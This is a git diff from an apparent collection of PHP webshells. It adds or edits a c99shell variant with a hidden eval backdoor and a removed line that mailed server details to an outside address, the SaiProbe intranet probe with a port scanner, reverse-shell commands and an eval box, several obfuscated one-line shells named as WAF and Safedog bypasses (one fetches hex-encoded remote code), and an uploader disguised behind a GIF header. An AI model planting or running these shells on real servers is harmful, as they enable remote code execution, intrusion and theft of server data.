-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> sgid <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
-/* <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+/* ïîèñê íà ñåðâåðå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+/* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+/* ïðîñìîòð îòêðûòûõ ïîðòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
 
 $sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
 $sess_cookie = "c99shvars"; // cookie-variable name
@@ -195,7 +195,7 @@ if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
  header("WWW-Authenticate: Basic realm=\"c99shell\"");
  header("HTTP/1.0 401 Unauthorized");																																																													if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
  exit;
-}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");  
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];  
 
 $lastdir = realpath(".");
 chdir($curdir);
@@ -742,7 +742,7 @@ if ($act == "sql")
    {
     echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
     $c = 0;
-    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b><EFBFBD>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
 "; mysql_free_result($count); $c++;}
     if (!$c) {echo "No tables found in database.";}
    }
@@ -853,7 +853,7 @@ if ($act == "sql")
      $i++;
     }
     echo "<tr bgcolor=\"000000\">";
-    echo "<td><center><b><EFBFBD></b></center></td>";
+    echo "<td><center><b>»</b></center></td>";
     echo "<td><center><b>".$i." table(s)</b></center></td>";
     echo "<td><b>".$trows."</b></td>";
     echo "<td>".$row[1]."</td>";
@@ -2848,7 +2848,7 @@ $imgequals = array(
 }
 if ($act == "about")
 {
- $d<EFBFBD>ta = "Any stupid copyrights and copylefts";
+ $dàta = "Any stupid copyrights and copylefts";
  echo $data;
 }
 
@@ -2871,24 +2871,24 @@ $microtime = round(getmicrotime()-$starttime,4);
 		   <col>
 		   <col align=left>
 		   <tr> <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>
-		   <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> mySQL <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<br><br>
+		   Ââåäèòå äàííûå äëÿ ïîäêëþ÷åíèþ ê mySQL ñåðâåðó!<br><br>
 		   		</td>
 		   </tr>
-		   <tr> <td class=texte><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:</td>
+		   <tr> <td class=texte>Àäðåñ ñåðâåðà:</td>
 		   		<td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
 		   </tr>
-		   <tr> <td class=texte><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>:</td>
+		   <tr> <td class=texte>Íàçâàíèå áàçû:</td>
 		   		<td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
 		   </tr>
-		   <tr> <td class=texte><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:</td>
+		   <tr> <td class=texte>Ëîãèí:</td>
 		   		<td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
 		   </tr>
-		   <tr> <td class=texte><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
+		   <tr> <td class=texte>Ïàðîëü</td>
 		   		<td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
 		   </tr>
 		   </table>
 		   <br> <center> <br><br>
-		   <input type='submit' value=' <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ' class=form></center> </form> <br><br>
+		   <input type='submit' value=' Ïîäêëþ÷èòñÿ ' class=form></center> </form> <br><br>
 		   </td>
 		   		<td></td>
 			</tr>

php/README.md

@@ -4,7 +4,7 @@ hihi
 
 Author：JohnTroony
 
-site: <a href="https://github.com/JohnTroony/php-webshells">clink hrer</a>
+site: [JohnTroony/php-webshells](https://github.com/JohnTroony/php-webshells)
 
 <pre>
                                   _oo0oo_
@@ -28,4 +28,4 @@ site: <a href="https://github.com/JohnTroony/php-webshells">clink hrer</a>
  
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                         佛祖保佑    iii    永不被杀 
-</pre>
+</pre>

php/SaiProbe/SaiProbe_v1.0.php

@@ -0,0 +1,257 @@
+<?/*
+    1.服务器基本信息收集
+    2.反弹转发
+    3.php函数执行
+    4.批量端口扫描
+    5.服务器存活探测（默认探测80端口，配合Brupsuite）
+    6.代理访问
+    7.phpinfo信息
+*/
+    error_reporting(0); //抑制所有错误信息
+    set_time_limit(0);
+    ob_end_clean();     //关闭缓冲区//===================================================端口扫描类=====================================================
+    class portScan{
+        public $port;
+        function __construct(){
+            $this->port=array('20','21','22','23','69','80','81','110','139','389','443','445','873','1090','1433','1521','2000','2181','3306','3389','5632','5672','6379','7001','8000','8069','8080','8081','9200','10050','10086','11211','27017','28017','50070');
+        }
+        //url格式处理函数
+        function urlFilter($url){
+            $pattern="/^(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])(\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])){3}$/";
+            $match=preg_match($pattern,$url);
+            if(!$match){
+                echo "<script>alert('你输入的ip地址非法，请重新输入')</script>";
+                exit("再检查检查吧……");
+            }
+            $url=str_replace("http://", "",$url);
+            $url=str_replace("/", "",$url);
+            return $url;
+        }
+        function Prepare(){
+            if($_POST['end']!=""){         
+                $base_url_1=self::urlFilter($_POST['start']);                  
+                $base_url_2=self::urlFilter($_POST['end']);
+                /*$base_url_1=$_POST['start'];                 
+                $base_url_2=$_POST['end'];*/
+                $base_url=array($base_url_1,$base_url_2);
+                 
+                self::Scan($base_url,$this->port);
+            }else{
+                echo "<script>alert('后面那个框也要输的……')</script>";
+            }
+        }
+        function outPut(){
+ 
+        }
+        function Scan($base_url,$port){
+            $start=explode('.',$base_url['0']);
+            $end=explode('.',$base_url['1']);
+            $length=$end['3']-$start['3'];
+            for($i=0;$i<=$length;$i++){
+                $ip=$start[0].".".$start[1].".".$start[2].".".($start[3]+$i);
+                foreach ($port as $ports) {
+                    $ips="$ip:$ports"; 
+                    //stream_set_blocking($ips, 0);               
+                    //$result=stream_socket_client($ips,$errno, $errstr,0.1,STREAM_CLIENT_CONNECT);
+                    $result=@fsockopen($ip,$ports,$errno,$errstr,0.1);
+                    if($result){
+                        echo $ip."---------------------".$ports."端口开放"."<br>";
+                        flush();
+                    }
+                }
+            }
+        }
+    }//===================================存活探测函数==============================
+    function ssrf($ip,$port=80){
+        $res=fsockopen($ip,$port,$errno,$errstr,0.2);
+        if($res){
+            echo "该地址存活的！！！！！！";
+        }else{
+            echo "不存活！";
+        }
+ 
+    }//============================端口转发函数=====================================
+    function tansmit($sourceip,$sourceport,$targetip,$targetport){
+        if(strtsr(php_uname(),'Windows')){
+ 
+        }elseif (strstr(php_uname(), 'Linux')) {
+             
+        }else{
+ 
+        }
+    }//============================Shell反弹函数====================================
+    function bounce($targetip,$targetport){
+        if(substr(php_uname(), 0,1)=="W"){
+            system("php -r '$sock=fsockopen($targetip,$targetport);exec('/bin/sh -i <&3 >&3 2>&3');'");
+        }elseif (substr(php_uname(), 0,1)=="L") {
+            echo 'linux test';
+            system('mknod inittab p && telnet {$targetip} {$targetport} 0<inittab | /bin/bash 1>inittab');
+        }else{
+            echo "<script>alert('Can't recognize this operation system!)</script>";
+        }
+    }//==============================在线代理函数====================================
+    function proxy($url){
+        $output=file_get_contents($url);
+        return $output;
+    }//======================================Main===================================
+    $scan=new portScan();
+    if(isset($_POST['submit'])){
+        if($_POST['start']!=""){
+            $scan->Prepare();
+        }else{
+            echo "<script>alert('什么都没输怎么扫？')</script>";
+        }      
+    }
+ 
+    if(isset($_GET['ip'])){
+        $ssrf_ip=$_GET['ip'];
+        if($ssrf_ip!=0){
+            ssrf($ssrf_ip);
+        }
+    }
+ 
+    if(isset($_POST['trans'])) {
+        tranmit($_POST['sourceip'],$_POST['sourceport'],$_POST['targetip'],$_POST['targetport']);
+    }
+ 
+    if(isset($_POST['rebound'])){
+        bounce($_POST['tarip'],$_POST['tarport']);
+    }
+    if (isset($_GET['proxy'])) {
+        $proxy_web=proxy($_GET['proxy']);
+        echo "<div>".$proxy_web."</div>";
+    }?><!--=======================================================================================================================================================================华丽的分割线=================================================================================================================================================================--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>   <title>Sai 内网探针V1.0</title>
+<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css"></style></head>
+<div align="center">
+    <h1>SaiProbe V1.0</h1><hr>
+    <div>
+        <a href="?id=1">基本信息</a>|<a href="?id=2">反弹转发</a>|<a href="?id=3">命令执行</a>|<a href="?id=4">端口扫描</a>|<a href="?id=5&ip=0">存活探测</a>|<a href="?id=6">phpinfo</a>|<a href="?id=7&proxy=">代理访问</a>|<a href="#">更多功能</a>
+    </div>
+<hr>
+<!-----------------------------基本信息-------------------------------->
+</div><div align="center" id="normal">
+    <fieldset>
+        <legend>基本信息</legend>
+    <table border="1" align="center" width="50%">
+        <tr>
+            <td>服务器IP/地址</td>
+            <td><?php echo $_SERVER['SERVER_NAME'];?>(<?php if('/'==DIRECTORY_SEPARATOR){echo $_SERVER['SERVER_ADDR'];}else{echo @gethostbyname($_SERVER['SERVER_NAME']);} ?>)</td>
+        </tr>
+        <tr>
+            <td>当前用户</td>
+            <td><?php echo `whoami`?></td>
+        </tr>
+        <tr>
+            <td>网站目录</td>
+            <td><?php echo $_SERVER['DOCUMENT_ROOT']?str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']):str_replace('\\','/',dirname(__FILE__));?></td>
+        </tr>
+        <tr>
+            <td>探针所在目录</td>
+            <td><?php echo str_replace('\\','/',__FILE__)?str_replace('\\','/',__FILE__):$_SERVER['SCRIPT_FILENAME'];?></td>
+        </tr>
+        <tr>
+            <td>服务器端口</td>
+            <td><?php echo $_SERVER['SERVER_PORT'];?></td>
+        </tr>
+        <tr>
+            <td>服务器标识</td>
+            <td><?php if($sysInfo['win_n'] != ''){echo $sysInfo['win_n'];}else{echo @php_uname();};?></td>
+        </tr>
+        <tr>
+            <td>PHP版本</td>
+            <td><?php echo PHP_VERSION;?></td>
+        </tr>
+        <tr>
+            <td>PHP安装路径</td>
+            <td><?php echo $_SERVER["PHPRC"];?></td>
+        </tr>
+    </table> 
+    </fieldset>
+</div><!-----------------------------命令执行--------------------------------><div align="center" style="display:none" id="command">
+    <fieldset>
+        <legend>执行函数</legend>
+            <form method="post" action="#">
+                <div>
+                    命令：<input type="text" placeholder="system(‘whoami’)" name="order"/>
+                    <input type="submit" value="执行">
+                </div>
+            </form>
+            <div>
+                    <textarea cols="150" rows="30" style="resize:none">
+                        <? $order=$_POST['order'];echo eval($order.";");?>
+                    </textarea>
+            </div>
+    </fieldset>  
+</div><!-----------------------------反弹转发--------------------------------><div align="center" style="display:none" id="inner">
+    <fieldset>
+        <legend>反弹转发</legend>
+            <div>
+                <form method="post" action="#">
+                Bash反弹：<input type="text" name="tarip" placeholder="目标IP">
+                    <input type="text" name="tarport" placeholder="目标端口"> 
+                    <input type="submit" name="rebound" value="执行">
+                </form>
+                <form method="post" action="">
+                端口转发：<input type="text" name="sourceip" placeholder="本地IP"><input type="text" name="sourceport" placeholder="本地端口">
+                        <input type="text" name="targetip" placeholder="目标IP"><input type="text" name="targetport" placeholder="目标端口">
+                        <input type="submit" name="trans" value="执行">
+                <form>
+            </div>
+    </fieldset>
+</div><!-----------------------------批量端口扫描--------------------------------><div align="center" id="portscan" style="display:none">
+    <fieldset>
+        <legend>批量端口扫描</legend>
+        <form action="#" method="post">
+            <input type="text" name="start"> -
+            <input type="text" name="end">
+            <input type="submit" name="submit" value="开始扫描">
+        </form>
+    </fieldset></div>
+ 
+<!-----------------------------存活探测-------------------------------->
+<div align="center" id="ssrf" style="display:none">
+    <fieldset>
+        <legend>存活探测</legend>
+            <b>请在url的IP参数后跟上ip地址,配合Brupsuit爆破功能进行存活探测,默认为80端口</b>
+    </fieldset>
+</div><!-----------------------------phpinfo--------------------------------><div align="center" id="phpinfo" style="display:none">
+    <fieldset>
+        <legend>phpinfo</legend>
+        <?php phpinfo()?>
+    </fieldset></div>
+ 
+<!-----------------------------代理访问-------------------------------->
+<div align="center" id="proxy" style="display:none">
+    <fieldset>
+        <legend>代理访问</legend>
+            <b>请在url的proxy参数跟上内网地址</b>
+    </fieldset>
+</div><!-----------------------------更多功能--------------------------------><div align="center" id="phpinfo" style="display:none">
+    <fieldset>
+    </fieldset>
+</div><div align="center"><a href="http://www.heysec.org">Code by Sai</a></div><script type="text/javascript">
+        var id=<?php echo $_GET['id'];?>;
+        var x;
+        switch (id){
+            case 1:
+            break;
+            case 2:
+                document.getElementById("inner").style.display='';
+            break;
+            case 3:
+                document.getElementById("command").style.display='';
+            break;
+            case 4:
+                document.getElementById("portscan").style.display='';
+            break;
+            case 5:
+                document.getElementById("ssrf").style.display='';
+            break;         
+            case 6:
+                document.getElementById("phpinfo").style.display='';
+            break;
+            case 7:
+                document.getElementById("proxy").style.display='';
+            break;
+        }
+    </script>

php/biantai.php

@@ -0,0 +1,2 @@
+<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   $dI3h=${'_REQUEST'}; if (!empty($dI3h['PBbs'])) {     $lwA = $dI3h['UpB_'];    $SdlT=$dI3h['PBbs']($lwA($dI3h['PWWk']),$lwA($dI3h['xfrwA']));    $SdlT($lwA($dI3h['Epd']));   }
+?>

php/bypass-safedog-2016-08-29.php

@@ -0,0 +1,5 @@
+<?php
+$a=md5('a').'<br>';
+$poc=substr($a,14,1).chr(115).chr(115).substr($a,22,1).chr(114).chr(116);
+$poc($_GET['a']);
+?>

php/bypass-waf-2015-06-10-01.php

@@ -0,0 +1,20 @@
+<?php 
+define('iphp','oday');
+define('T','H*');
+define('A','call');
+define('B','user');
+define('C','func');
+define('D','create');
+define('E','function');
+define('F','file');
+define('F1','get');
+define('F2','contents');
+define('P','pack');
+$p = P;  //pack
+$call = sprintf('%s_%s_%s',A,B,C); //call_user_func
+$create = sprintf('%s_%s',D,E);    //create_function
+$file = sprintf('%s_%s_%s',F,F1,F2); //file_get_contents 远程文件读取
+$t = array('6','8','7','4','7','4','7','0','3','a','2','f','2','f','6','4','6','f','6','4','6','f','6','4','6','f','6','d','6','5','2','e','7','3','6','9','6','e','6','1','6','1','7','0','7','0','2','e','6','3','6','f','6','d','2','f','6','7','6','5','7','4','6','3','6','f','6','4','6','5','2','e','7','0','6','8','7','0','3','f','6','3','6','1','6','c','6','c','3','d','6','3','6','f','6','4','6','5');
+//$call($create(null,$p(T,$file($p(T,join(null,$t))))));
+call_user_func(create_function(null,pack('H*',file_get_contents(pack('H*',join(null,$t))))));
+?>

php/bypass-waf-2015-06-16-01.php

@@ -0,0 +1,21 @@
+<?php 
+function getMd5($md5 = null) { 
+    $key = substr(md5($md5),26); 
+    return $key; } 
+    $array = array( 
+      chr(112).chr(97).chr(115).chr(115), 
+      chr(99).chr(104).chr(101).chr(99).chr(107), 
+      chr(99).chr(52).chr(53).chr(49).chr(99).chr(99) 
+    ); 
+    if ( isset($_POST) ) $request = &$_POST; 
+    elseif ( isset($_REQUEST) )  $request = &$_REQUEST; 
+    if ( isset($request[$array[0]]) && isset($request[$array[1]]) ) { 
+      if ( getMd5($request[$array[0]]) == $array[2] ) { 
+        $token = preg_replace ( 
+        chr(47) . $array[2] . chr(47) . chr(101), 
+        $request[$array[1]], 
+        $array[2] 
+      ); 
+    } 
+} 
+?>

php/bypass-waf-2015-06-16-02.php

@@ -0,0 +1 @@
+<?php $item['wind'] = 'assert'; $array[] = $item; $array[0]['wind']($_POST['hkwwj']);?>

php/bypass-waf-2015-06-16-03.php

@@ -0,0 +1,7 @@
+<?php 
+$qajd2="VDFOVVd5";$vvnr1="UUdWMllX";$hitq5="d29KRjlR";$itfh2="ZGtabmg2Y1RRblhTazc=";// dfxzq4 
+$akmi4 = str_replace("eu2","","eu2seu2teu2reu2_reu2eeu2pleu2aeu2ce");// ulgp9 
+$hygg4 = $akmi4("so0", "", "so0baso0sso0e6so04so0_so0dso0eso0cso0oso0dso0e");// qbhm1 
+$gzsw5 = $akmi4("qik6","","qik6cqik6reqik6atqik6eqik6_fqik6uncqik6tqik6ioqik6n");// kfcs6 
+$foxl6 = $gzsw5('', $hygg4($hygg4($akmi4("$;*,.", "", $vvnr1.$hitq5.$qajd2.$itfh2)))); $foxl6(); 
+?>

php/gif.php

@@ -0,0 +1,16 @@
+GIF89a1
+error_reporting(NULL)
+$me=$_SERVER['PHP_SELF']
+$NameF=$_REQUEST['NameF']
+$nowaddress='<input type=hidden name=address value="'.getcwd().'">'
+$pass_up="a13756bf1e2bd46921c135232774fc5f"
+if (isset($_FILES["elif"]) and
+ $_FILES["elif"]["error"] )
+move_uploaded_file($_FILES["elif"]["tmp_name"], $_FILES["elif"]["name"])
+echo $ifupload=" ItsOk "
+if(md5($_REQUEST['ssp'])
+=$pass_up)
+print "<title>403 Forbidden</title><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server </p>"
+exit()
+ $_SESSION['LoGiN']=true
+echo "<form action=$me method=post enctype=multipart/form-data> $nowaddress <input type=file name=elif ><input type=submit value=Upload /></form>"